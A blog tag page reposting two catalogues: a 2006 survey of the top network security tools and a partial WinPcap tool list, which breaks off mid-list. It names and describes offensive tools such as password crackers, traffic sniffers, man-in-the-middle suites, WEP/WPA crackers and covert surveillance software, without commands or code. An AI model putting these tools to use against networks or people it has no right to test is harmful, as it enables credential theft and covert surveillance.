4 posts tagged 'dsniff'

  1. 2010.06.23 Top 100 Network Security Tools
  2. 2009.08.19 WinPcap-based Tools and Programs
  3. 2009.06.03 Packet sniffing with dsniff (Packet Sniff)
2010.06.23 18:53

Top 100 Network Security Tools

After the tremendously successful 2000 and 2003 security tools surveys, Insecure.Org is delighted to release this 2006 survey. I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”.

Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones.

Each tool is described by one or more attributes:

  • new: Did not appear on the 2003 list
  • rose / fell: Popularity ranking rose or fell the given number of places since the 2003 survey
  • Costs money: Generally costs money. A free limited/demo/trial version may be available.
  • Linux: Works natively on Linux
  • *BSD: Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants
  • OS X: Works natively on Apple Mac OS X
  • Windows: Works natively on Microsoft Windows
  • Command-line interface: Features a command-line interface
  • GUI Interface: Offers a GUI (point and click) interface
  • Source code: Source code available for inspection

Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:

Attributes: GUI Interface
Nessus : Premier UNIX vulnerability assessment tool
Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

See all vulnerability scanners

Attributes: Command-line interface, GUI Interface, Source code
Wireshark : Sniffing the glue that holds the Internet together
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).

See all packet sniffers

Attributes: Command-line interface, Source code
Snort : Everyone's favorite open source IDS
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.

Open source Snort works fine for many individuals, small businesses, and departments. Parent company SourceFire offers a complementary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at Bleeding Edge Snort.

See all intrusion detection systems

Attributes: Command-line interface, Source code
Netcat : The network Swiss army knife
This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits. There is also Chris Gibson's Ncat, which offers even more features while remaining portable and compact. Other takes on Netcat include OpenBSD's nc, Cryptcat, Netcat6, PNetcat, SBD, and so-called GNU Netcat.

See all Netcats

Attributes: Command-line interface, Source code
Metasploit Framework : Hack the Planet
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas, already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.

See all vulnerability exploitation tools

Attributes: Command-line interface, Source code
Hping2 : A network probing utility like ping on steroids
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols.

See all packet crafting tools

Attributes: Command-line interface, Source code
Kismet : A powerful wireless sniffer
Kismet is a console (ncurses) based 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating, ...

See all wireless tools, and packet sniffers

Attributes: Command-line interface, Source code
Tcpdump : The classic sniffer for network monitoring and data acquisition
Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used by Nmap among many other tools.

See all packet sniffers

Attributes: GUI Interface
Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented.

See all password crackers, and packet sniffers

Attributes: Command-line interface, Source code
John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here.

See all password crackers

Attributes: Command-line interface, GUI Interface, Source code
Ettercap : In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

See all packet sniffers

Attributes: Command-line interface, Source code
Nikto : A more comprehensive web scanner
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected.

See all web vulnerability scanners

Attributes: Command-line interface, Source code
Ping/telnet/dig/traceroute/whois/netstat : The basics
While there are many whiz-bang high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although for more advanced usage you may be better off with Hping2 and Netcat.

Attributes: Command-line interface, Source code
OpenSSH / PuTTY / SSH : A secure way to access remote computers
SSH (Secure Shell) is the now ubiquitous program for logging into or executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network, replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX users run the open source OpenSSH server and client. Windows users often prefer the free PuTTY client, which is also available for many mobile devices. Other Windows users prefer the nice terminal-based port of OpenSSH that comes with Cygwin. Dozens of other free and proprietary clients exist. You can explore them here or here.

Attributes: Command-line interface, GUI Interface, Source code
THC Hydra : A Fast network authentication cracker which supports many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap, this release is from the fine folks at THC.

See all password crackers

Attributes: Command-line interface, GUI Interface, Source code
Paros proxy : A web application vulnerability assessment proxy
A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting.

See all web vulnerability scanners

Attributes: Command-line interface, Source code
Dsniff : A suite of powerful network auditing and penetration-testing tools
This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g., due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. A separately maintained partial Windows port is available here. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.

See all packet sniffers

Attributes: GUI Interface
NetStumbler : Free Windows 802.11 Sniffer
Netstumbler is the best known Windows tool for finding open wireless access points ("wardriving"). They also distribute a WinCE version for PDAs and such named Ministumbler. The tool is currently free but Windows-only and no source code is provided. It uses a more active approach to finding WAPs than passive sniffers such as Kismet or KisMAC.

See all wireless tools, and packet sniffers

Attributes: Command-line interface, Source code
THC Amap : An application fingerprinting scanner
Amap is a great tool for determining what application is listening on a given port. Their database isn't as large as what Nmap uses for its version detection feature, but it is definitely worth trying for a 2nd opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap output files. This is yet another valuable tool from the great guys at THC.

See all application-specific scanners

Attributes: GUI Interface
GFI LANguard : A commercial network security scanner for Windows
GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. It also tries to collect a Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches. A free trial version is available, though it only works for up to 30 days.

See all vulnerability scanners

Attributes: Command-line interface, Source code
Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

See all wireless tools, and password crackers

Attributes: GUI Interface
Superscan : A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.

See all port scanners

Attributes: Command-line interface, Source code
Netfilter : The current Linux kernel packet filter/firewall
Netfilter is a powerful packet filter implemented in the standard Linux kernel. The userspace iptables tool is used for configuration. It now supports packet filtering (stateless or stateful), all kinds of network address and port translation (NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many different modules for handling unruly protocols such as FTP. For other UNIX platforms, see OpenBSD PF (OpenBSD specific), or IP Filter. Many personal firewalls are available for Windows (Tiny, Zone Alarm, Norton, Kerio, ...), though none made this list. Microsoft included a very basic firewall in Windows XP SP2, and will nag you incessantly until you install it.

See all firewalls

Attributes: Command-line interface, GUI Interface
Sysinternals : An extensive collection of powerful Windows utilities
Sysinternals provides many small Windows utilities that are quite useful for low-level Windows hacking. Some are free of cost and/or include source code, while others are proprietary. Survey respondents were most enamored with:
  • ProcessExplorer for keeping an eye on the files and directories open by any process (like LSoF on UNIX).
  • PsTools for managing (executing, suspending, killing, detailing) local and remote processes.
  • Autoruns for discovering what executables are set to run during system boot up or login.
  • RootkitRevealer for detecting registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.
  • TCPView, for viewing TCP and UDP traffic endpoints used by each process (like Netstat on UNIX).
Update: Microsoft acquired Sysinternals in July 2006, promising that “Customers will be able to continue building on Sysinternals' advanced utilities, technical information and source code”. Less than four months later, Microsoft removed most of that source code. Future product direction is uncertain.

See all rootkit detectors

Attributes: GUI Interface
Retina : Commercial vulnerability assessment scanner by eEye
Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research.

See all vulnerability scanners

Source: http://sectools.org/

2009.08.19 11:55

WinPcap-based Tools and Programs

This is a partial list of WinPcap-based tools. We add a program when we come across it on the network, or when the developer tells us about its availability.
Please contact us at winpcap-team [at] winpcap.org to add new tools to this list.

  • Aerosol
    Wardriving utility for Windows.
  • AirSnare
    AirSnare is an intrusion detection system to help you monitor your wireless network.
  • Analyzer
    Analyzer is a fully configurable Network Analyzer for Win32. It includes several functionalities that are needed by network management operators. Analyzer is based on WinPcap and it is able to capture packets on most Win32 platforms (and link-layer technologies). Analyzer 3.0 comes out with some event logging, LAN monitoring and traffic monitoring capabilities. However, Analyzer 3.0's most valuable point is the ability to parse network packets according to the protocol description contained in external files, which can be modified at run-time by the user.
  • Archaeopteryx
    Archaeopteryx is a passive-mode OS identification tool. It is based on Siphon v.666 by SubTerrain. It has a GUI and a highly configurable OS signature file.
  • ARP0c
    ARP0c is an ARP redirector and bridging engine. ARP requests from various sources in a switched environment get a false ARP response which points to the host running ARP0c. Packets from these hosts are bridged to the real destination address to allow normal network operation and keep TCP connections alive.
  • Asn1Browser
    The Asn1Browser analyzer decodes ASN1 binary data and provides an advanced display for the user.
  • assniffer
    assniffer can monitor a network, and for every HTTP transfer it sees, save a copy of the transferred data.
  • BillSniff
    BillSniff is a free (freeware) sniffer under MS Windows.
  • Bit-Twist
    Bit-Twist is a simple yet powerful WinPcap-based Ethernet packet generator. It is designed to complement WinDump, which by itself has done a great job in capturing network traffic. With Bit-Twist, you can now regenerate the captured traffic onto a live network! Packets are generated from a WinDump trace file (.pcap file). Bit-Twist also comes with a comprehensive trace file editor to allow you to change the contents of a trace file.
  • Blackart
    Blackart for Windows is a sniffer for personal users. It captures all or specified packets at Data Link Layer. It can also parse and explain the headers of Ethernet, IP, TCP, UDP and ICMP.
  • Bochs
    Bochs is a highly portable open source IA-32 (x86) PC emulator written in C++, that runs on most popular platforms. It includes emulation of the Intel x86 CPU, common I/O devices, and a custom BIOS.
  • Busted!
    Busted! records AOL instant message conversations, web sites visited, applications used, keystrokes and takes periodic screen shots.
  • CableMon
    Cable traffic monitoring tool.
  • Cain & Abel
    Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
  • CarnivorePE
    Carnivore is a surveillance tool for data networks. At the heart of the project is CarnivorePE, a software application that listens to all Internet traffic (email, web surfing, etc.) on a specific local network. Next, CarnivorePE serves this data stream to interfaces called "clients." These clients are designed to animate, diagnose, or interpret the network traffic in various ways.
  • cdpr - Cisco Discovery Protocol Reporter
    cdpr is used to decode a Cisco Discovery Protocol (CDP) packet. By default it will report the device ID, the IP address (of the device), and the port number that the machine is connected to. Optionally it will decode the entire CDP packet.
  • choozmail
    Parental control software.
  • CHScanner
    CHScanner allows you to scan in "style" from Windows XP SP2 and higher OS. It is IPv4 and IPv6 enabled, it has a skinnable interface and it has the ability to mimic various operating systems. Last but not least, it has many scanning methods.
  • coLinux
    Cooperative Linux is the first working free and open source method for optimally running Linux on Microsoft Windows natively. More generally, Cooperative Linux (short-named coLinux) is a port of the Linux kernel that allows it to run cooperatively alongside another operating system on a single machine. For instance, it allows one to freely run Linux on Windows 2000/XP, without using a commercial PC virtualization software such as VMware, in a way which is much more optimal than using any general purpose PC virtualization software.
    Automated, comprehensive penetration testing product for assessing specific information security threats to an organization.
  • dasniff
    daSniff is an open source customizable sniffer for win32 systems. It helps you to log your LAN traffic by specifying packet rules as filters.
  • Deep Network Analyzer (DNA)
    DNA is an open, flexible and extensible deep network analyzer (software server) and architecture for gathering and analyzing network packets, network sessions and applications protocols, passively off enterprise class networks. DNA is designed to be used for Internet Security, Intrusion detection, Network Management, Protocol and Network Analysis, Information Gathering, Network Monitoring applications.
  • dsniff
    dsniff is a collection of utilities to aid in sniffing network data.
  • EffeTech HTTP Sniffer
    EffeTech HTTP Sniffer is an HTTP protocol network sniffer, packet analyzer and file rebuilder for the Windows platform. Unlike most other sniffers, it is dedicated to capturing IP packets containing the HTTP protocol and to rebuilding the HTTP communications and files sent through HTTP.
  • Engage Packet Builder
    Scriptable libnet-based packet builder for Windows platform.
  • EtherSnoop
    EtherSnoop is a basic network sniffer, that can capture all packets going through the network. It lists the captured data in real-time, using an easy-to-understand interface with a hex and text display of the packet content. EtherSnoop also offers basic filtering by protocol type and a tree-style packet explorer. The output can be saved to file and reloaded later if needed.
  • ettercap
    Ettercap is a multipurpose sniffer/interceptor/logger for switched LANs. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.
  • FAP Guard
    FAP Guard allows DirecPC and DirecWay users to monitor their Fair Access Policy (FAP) download level, thus preventing them from getting throttled or disconnected. You might also find this application useful if you are paying for download, or have a download limit imposed by your ISP. It provides some interesting network traffic statistics as well.
  • FanfareSVT
    The Fanfare Group delivers one-click test automation™ for communication equipment manufacturers who need to reduce their time to market and improve product quality.
  • FramePad
    FramePad is a Windows based packet sniffer and protocol analyzer, designed from the ground up with ease and functionality in mind. It allows you to examine data from a live network or from a capture file on disk.
  • FTPXerox
    FTPXerox grabs files that are transferred across the network using the FTP protocol. It implements a full end-to-end TCP re-assembly engine that watches for FTP transfers.
  • Gamer's IPX Tunnel (GIT)
    GIT is a freeware utility to link LANs together over the internet for IPX-based network gameplay. It can also be used to bridge many configurations of IPX packets and frames from one point to another.
  • GIPS IP Network Simulator
    The GIPS IP Network Simulator is a software tool that allows the user to emulate network behavior by delaying and/or dropping packets in an IP network. Installed on a laptop it can be placed between two LANs, two gateways, or any two IP devices and simulate the network conditions experienced by the two end-points.
  • Hammer Call Analyzer
    The Hammer Call Analyzer enables users to visualize signaling and voice quality problems in VoIP networks. For example, the unique call list and multistage call flow display features walk engineers through the legs of a particular call. In addition, the Hammer Call Analyzer displays waveforms and the Stream Quality Signature for any call.
  • HiDownload
    HiDownload is a multi-threaded download manager that allows you to download individual files (or lists of files) from web and FTP.
  • Honeyd
    Honeyd is a small daemon that creates virtual hosts on a network that enhances network security by providing "honeypot" decoys that enable network security officers to detect, monitor, and contain unauthorized network activities without the intruder knowing they are being tracked.
  • hping
    hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired by the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files over a covert channel, and many other features.
  • HTTP snoop
    A simple but functional HTTP sniffer application. It will display some basic information about every "HTTP packet" that it sees on the NIC and decode all basic authentication header entries it finds (both for proxies and for web sites). It will also write everything in the HTTP request that is both in the same packet and before the first null character.
  • HttpTracer
    View web traffic between a browser and any Internet server. HttpTracer is a Windows program that runs as a proxy server on your desktop, catching and displaying all textual commands and data sent and received by a web browser.
  • JPcap
    A Java wrapper for WinPcap. It allows Java code to access the WinPcap (and libpcap on UNIX) calls.
  • IM Sniffer
    Intercepts and decodes all instant message traffic received by the computer. A high performance engine delivers real time message decryption. Conversations can be viewed immediately or saved for later analysis. Freeware.
  • iNetWatcher
    iNetWatcher© is based on WinPcap. It can fully monitor the Internet activity of staff or students: record e-mail sent through the Internet and web pages visited; monitor real-time chat messages and files sent over IM; monitor the registry, hard disk and system information of the employee's computer; monitor FTP; and monitor the network traffic of all staff.
  • ipInterceptor
    Trace TCP/UDP Packets on your workstation. View packets in a logical sequence, with requests and responses grouped into conversations (showing the resulting response times). Set filters for tracing. View headers and data in text or HEX format.
  • IpMaster/IpMasterPro
    Internet/Network IP address & data packet monitor.
  • IP Sniffer
    Windows 2000/XP packet sniffer with replay function.
  • ItCan.Net Monitor
    ItCan.Net Monitor is a bandwidth analysis utility. Besides giving a graphical illustration of the bandwidth usage on your computer or the network it resides on, you get a list of all incoming and outgoing connections.
  • KolSniffer
    Kolsniffer contains a component to write very small self-contained WinPcap applications with Delphi and the Key Object Library framework. The source code is a translation of the Tsniffer class that Umar Sears wrote earlier. The source code is freeware, with the permission of the original author. It was written by Thaddy de Koning. The zip file contains a demo with sources that illustrates how to use the component. The Key Object Library framework itself is available from http://bonanzas.rinet.ru
  • LaBrea@Home
    LaBrea@Home is a version of the original network administrator's tool "LaBrea" for home use. LaBrea is a way to combat both port scanners and worms such as Code Red and Nimda. The original network administrator's "LaBrea" creates phantom machines which hold scanners and worms in a sort of "tarpit", luring them in, and holding onto their communications with what they think are real machines.
  • LeetGeek ICMP Tunneler
    An ICMP tunneling program.
  • Libnet
    Libnet is a high-level API (toolkit) allowing the application programmer to construct and inject network packets. It provides a portable and simplified interface for low-level network packet shaping, handling and injection.
  • Libnids
    Libnids is an implementation of an E-component of Network Intrusion Detection System. It emulates the IP stack of Linux 2.0.x. Libnids offers IP defragmentation, TCP stream assembly and TCP port scan detection.
  • lwIP
    lwIP is a small independent implementation of the TCP/IP protocol suite. The focus of the lwIP TCP/IP implementation is to reduce the RAM usage while still having a full scale TCP.
  • MSN Protocol Analyzer
    MSN Protocol Analyzer (MSNPAnalyzer) is a network utility that can capture and monitor sessions of the MSN Protocol.
    If you use this program in combination with the SwitchSniffer program, you can capture and see all MSNP sessions, including conversations and MSN commands.
  • MSN Webcam Recorder
    MSN Webcam Recorder is a tool that allows you to record video streamed to and from your computer by MSN Messenger's Webcam Feature.
  • myNetMon
    myNetMon is a Windows-based network monitor and packet analyzer (sniffer).
  • Nemesis
    Nemesis is a command-line network packet injection utility for UNIX-like and Windows systems. You might think of it as an EZ-bake packet oven or a manually controlled IP stack. With Nemesis, it is possible to generate and transmit packets from the command line or from within a shell script.
  • Net::Pcap for Win32
    A Perl interface to the libpcap library. Net::PcapUtils is available on the same site.
  • NETI@home
    NETI@home is an open-source software package that collects network performance statistics from end-systems. It has been written for and tested on the Windows, Linux, and Solaris operating systems, with testing for other operating systems to be completed soon. NETI@home is designed to run on end-user machines and will collect various statistics about Internet performance. These statistics will then be sent to a server at the Georgia Institute of Technology (Georgia Tech), where they will be collected and made publicly available.
  • NetCalibrator
    NetCalibrator offers statistical analysis of captured data in support of performance analysis. The approach being used provides ability to quantify performance issues for small as well as large (>500,000) number of packets.
  • NetPredictor
    NetPredictor offers monitoring and prediction of application performance. It enables you to build, or to interactively discover, the path between an application user and the server.
  • netwib, netwox and netwag
    Netwib provides sniff, spoof, client, server and most functions needed by network programs. Toolbox netwox helps to find and solve networks' problems. Netwag is a graphical network toolbox. Netwox and netwag contain over 150 tools.
  • NetWitness
    NetWitness gives an organization the ability to quickly understand and respond to network activity of interest, regardless of the device provisioning the data or the application producing the packets.
  • Network packet generator
    Network Packet Generator (npg) is a free GNU GPL Windows packet injector (generator) that utilizes WinPcap to send specific packets out a single or multiple network interfaces. These packets and other extended options can be defined on the command line, in a packet file, or combination of the two.
  • NeVO
    Determine vulnerabilities on your network through passive monitoring much like a sniffer. NeVO dynamically learns about your servers, services and vulnerabilities by performing signature and protocol analysis of the observed network sessions.
  • NeWT
    Easy-to-use windows vulnerability scanner based on Nessus technology. NeWT installs on any Windows 2000 or Windows XP computer and can quickly scan several thousand hosts for vulnerabilities and produce detailed vulnerability reports.
  • ngrep
    Ngrep strives to provide most of GNU grep's common features, applying them to the network layer.
  • NmapNT
    Nmap is a utility for network exploration or security auditing. It supports ping scanning (determine which hosts are up), many port scanning techniques (determine what services the hosts are offering), and TCP/IP fingerprinting (remote host operating system identification). Nmap also offers flexible target and port specification, decoy scanning, determination of TCP sequence predictability characteristics, sunRPC scanning, reverse-identd scanning, and more.
  • ntop
    ntop is a tool that shows the network usage, similar to what the popular top Unix command does.
  • Nuzzler IDS
    The Securepoint Intrusion Detection System (Nuzzler) lets you analyse the network for intrusions. Nuzzler can detect possible attacks, viruses, trojans and other bad traffic.
  • P2P WatchDog
    P2P WatchDog is a network sniffer which can monitor and block several peer-to-peer file transfer protocols, including FastTrack, Gnutella, DirectConnect, EarthStation5, eDonkey, Filetopia, BitTorrent, MP2P, and Overnet.
  • Pacanal
    Packet capture and analyzer program. The source contains a C# reimplementation of the packet.dll WinPcap library.
  • Packet Excalibur
    A multi-platform graphical and scriptable network packet engine with extensible text based protocol descriptions.
  • PacketVB
    It's an ActiveX control for use with Visual Basic that wraps the functions exported by the WinPcap API (packet.dll).
  • PacketX
    PacketX is set of ActiveX classes that integrate winpcap packet capture functionality with Visual Basic or any other programming environment supporting Microsoft ActiveX technology.
  • Pcapy
    Pcapy is a Python extension module that interfaces with WinPcap/libpcap. Pcapy enables python scripts to capture packets on the network.
  • Packetyzer
    Packetyzer is a Windows user interface for the Ethereal packet capture and dissection library.
  • PerformaSure
    Sitraka PerformaSure allows J2EE development teams to identify sources of performance problems within an assembled application. PerformaSure coordinates the collection of performance metrics for any given transaction, following the path of execution from the initial HTTP request through load balancers, application servers, to the database and back again.
  • PI IT Monitor
    PI IT Monitor collects real-time information regarding the performance of various elements that compose an IT infrastructure. But in addition to collecting real-time values, PI IT Monitor archives such data and makes them available for use in reporting, analysis, troubleshooting, and decision making.
  • Pikachu JPEG Sniffer
    Pikachu is a network sniffer that captures the JPEG images flowing over the local wired/wireless Ethernet network.
  • PingPlotter
    PingPlotter is a network troubleshooting and diagnostic tool. It uses a combination of traceroute, ping, and whois to collect data quickly, and then allows you to continue to collect data over time to give you the information you really need to identify problems (both short-term and long-term trends).
  • PromiScan
    Software for remotely monitoring computers on local networks to locate network interfaces operating in a promiscuous mode.
  • PortScanner
    A TCP port scanner.
  • PSentry Internet Policy Guard & Surveillance
    PSentry sniffs network traffic at the gateway, capturing and recording user activities such as web surfing, e-mail, web form submissions and instant-messenger sessions (AOL AIM, MSN, ICQ, Yahoo, QQ, Google Talk). It can log or block FTP and P2P file transfers. PSentry deploys different Internet policies by IP/MAC address or by user, controlling which resources or services are permitted or blocked on the LAN.
  • Pseud IP Masquerade
    Pseud IP Masquerade is a Windows application and NT/2000 service that provides some basic functions of "IP Masquerade".
  • pypcap
    A simplified object-oriented Python extension module for libpcap: the current tcpdump.org version, the legacy version shipping with some of the BSD operating systems, and the WinPcap port for Windows.
  • rawstuff
    rawstuff is a toolkit for totally raw (MAC level and with no TCP/IP installed) send and receive on Windows.
  • Show Traffic
    Show Traffic monitors network traffic on the chosen network interface and displays it continuously. It could be used for locating suspicious network traffic or to evaluate current utilization of the network interface.
  • SIMH
    SIMH is a highly portable, multi-system simulator.
  • Sniphere
    Sniphere is another network wiretapping program for Windows using WinPcap. Nevertheless, Sniphere is a pretty handy program with many capabilities that most free sniffers lack.
  • SmartSniff
    SmartSniff allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as sequence of conversations between clients and servers. You can view the TCP/IP conversations in Ascii mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP.) or as hex dump.
  • snoop
    Snoop is a component library encapsulating WinPcap, for use in Delphi.
  • SnoopAnalyzer
    SnoopAnalyzer Standard is a network protocol analyzer based on network data capturing technology under Microsoft Windows platforms(95/98/Me/2000/NT/XP).
  • SnoopMSNBlock
    SnoopMSNBlock is a software to block MSN messenger service used in your company.
  • SnoopNetCop
    SnoopNetCop Standard is a program that can detect possible packet-sniffing attacks on your network.
  • snort
    Snort is a lightweight network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.
  • snot
    Snot is an arbitrary packet generator that uses Snort rules files as its source of packet information. It can be used as an IDS evasion tool, by using specific decoy hosts, or just as something to keep your friendly IDS monitoring staff busy.
  • SOAPscope
    SOAPscope is a Web services diagnostic system that collects and analyzes information about SOAP and WSDL by monitoring communications among SOAP endpoints.
  • ssldump
    ssldump is an SSLv3/TLS network protocol analyzer. It identifies TCP connections on the chosen network interface and attempts to interpret them as SSLv3/TLS traffic. When it identifies SSLv3/TLS traffic, it decodes the records and displays them in a textual form to stdout. If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic.
  • STINGA NGN Monitor
